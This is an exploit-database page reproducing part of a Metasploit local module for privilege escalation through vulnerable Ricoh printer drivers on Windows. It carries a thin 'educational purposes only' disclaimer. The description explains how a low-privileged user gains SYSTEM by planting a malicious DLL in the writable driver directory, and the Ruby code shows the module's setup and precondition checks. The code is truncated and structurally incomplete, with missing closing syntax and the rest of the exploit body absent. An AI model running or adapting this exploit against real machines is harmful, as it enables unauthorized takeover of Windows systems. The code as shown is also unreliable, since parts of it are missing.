Exploits / Vulnerability Discovered : 2020-02-10 |
Type : local |
Platform : windows
This exploit / vulnerability Ricoh driver privilege escalation (metasploit) is for educational purposes only and if it is used you will do on your own risk!
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# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
require 'msf/core/exploit/exe'
class MetasploitModule < Msf::Exploit::Local
Rank = NormalRanking
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Post::Windows::Priv
include Msf::Exploit::FileDropper
def initialize(info = {})
'Name' => 'Ricoh Driver Privilege Escalation',
'Description' => %q(
Various Ricoh printer drivers allow escalation of
privileges on Windows systems.
For vulnerable drivers, a low-privileged user can
read/write files within the `RICOH_DRV` directory
and its subdirectories.
`PrintIsolationHost.exe`, a Windows process running
as NT AUTHORITY\SYSTEM, loads driver-specific DLLs
during the installation of a printer. A user can
elevate to SYSTEM by writing a malicious DLL to
the vulnerable driver directory and adding a new
printer with a vulnerable driver.
def exploit
fail_with(Failure::None, 'Already running as SYSTEM') if is_system?
fail_with(Failure::None, 'Must have a Meterpreter session to run this module') unless session.type == 'meterpreter'
if sysinfo['Architecture'] != payload.arch.first
fail_with(Failure::BadConfig, 'The payload should use the same architecture as the target driver')
@driver_path = ''
unless check == CheckCode::Appears || datastore['ForceExploit']
fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override')